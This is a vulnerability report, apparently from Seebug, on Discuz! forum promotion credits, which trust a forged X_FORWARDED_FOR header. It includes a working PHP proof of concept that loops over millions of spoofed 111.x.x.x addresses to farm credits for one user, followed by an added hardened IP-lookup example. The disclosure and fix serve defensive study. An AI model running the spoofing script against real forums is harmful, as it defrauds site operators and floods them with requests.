### Brief description:

The DZ promotion feature that awards credits for visits is flawed.

### Details:

![dz.jpg](https://images.seebug.org/upload/201309/101734447239d71dc43686ba230c139ea54bdc98.jpg)

This is where the IP address is determined:

![dz1.jpg](https://images.seebug.org/upload/201309/10173539b4e686648f36e40a550907ce5dc69e05.jpg)

When the X_FORWARDED_FOR header is present and does not match those few excluded cases, it is used as the IP address.

Because promotion credits are keyed on the visitor's IP, simply changing X_FORWARDED_FOR lets anyone farm credits at will.

### Proof of vulnerability:

```
<?php
// Sends one GET to the promotion link with a forged X_FORWARDED_FOR header.
function inj($ip) {
    $optionget = stream_context_create(array('http' => array(
        'method' => "GET",
        'ignore_errors' => true,
        'header' => "X_FORWARDED_FOR: $ip"
    )));
    $url = "http://www.xxx.com/forum.php?fromuid=3007";
    $contents = file_get_contents($url, false, $optionget);
    return $contents;
}

// Each request appears to come from a different address in 111.0.0.0/8,
// so the forum credits every one of them to fromuid=3007.
for ($i = 0; $i < 255; $i++)
    for ($j = 0; $j < 255; $j++)
        for ($k = 0; $k < 255; $k++)
            inj("111.$i.$j.$k");
?>
```
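As an added illustration of the fix (this is example code written for this page, not Discuz!'s own lookup), the PHP below places the weak pattern the report describes beside a hardened client-IP lookup that honours X-Forwarded-For only when the direct TCP peer is one of a configured list of trusted reverse proxies; the proxy list and the sample requests are assumptions constructed for the demonstration.

```php
<?php
// Added example, not Discuz! code. Shows the weak lookup the report describes
// beside a hardened one. Assumption: $trustedProxies lists the reverse proxies
// that really sit in front of the forum; any other peer talks to us directly.

// Weak: any request carrying X-Forwarded-For is believed. The header is
// attacker-controlled, which is exactly what the credit-farming PoC abuses.
function client_ip_weak(array $server): string
{
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) {
        return trim($server['HTTP_X_FORWARDED_FOR']);
    }
    return $server['REMOTE_ADDR'];
}

// Hardened: honour X-Forwarded-For only when the TCP peer is a trusted proxy,
// then read the list from the right, because the right-most entry is the one
// our own proxy appended and the only one a client cannot forge.
function client_ip_hardened(array $server, array $trustedProxies): string
{
    $peer = $server['REMOTE_ADDR'];
    if (!in_array($peer, $trustedProxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $peer;
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $trustedProxies, true)) {
            continue; // skip further hops that are our own proxies
        }
        $valid = filter_var($hops[$i], FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        return $valid !== false ? $valid : $peer; // malformed/private: fall back
    }
    return $peer; // every hop was one of our proxies
}

// Constructed sample requests (not captured traffic).
$trustedProxies = ['10.0.0.5'];
$direct   = ['REMOTE_ADDR' => '203.0.113.9',
             'HTTP_X_FORWARDED_FOR' => '111.1.2.3'];
$viaProxy = ['REMOTE_ADDR' => '10.0.0.5',
             'HTTP_X_FORWARDED_FOR' => '111.1.2.3, 203.0.113.9'];

echo "weak/direct:     ", client_ip_weak($direct), "\n";
echo "hardened/direct: ", client_ip_hardened($direct, $trustedProxies), "\n";
echo "hardened/proxy:  ", client_ip_hardened($viaProxy, $trustedProxies), "\n";
```

For the constructed direct request the weak function returns the forged 111.1.2.3 while the hardened one returns the peer address 203.0.113.9, and for the proxied request the hardened lookup also resolves to 203.0.113.9, the address the trusted proxy appended.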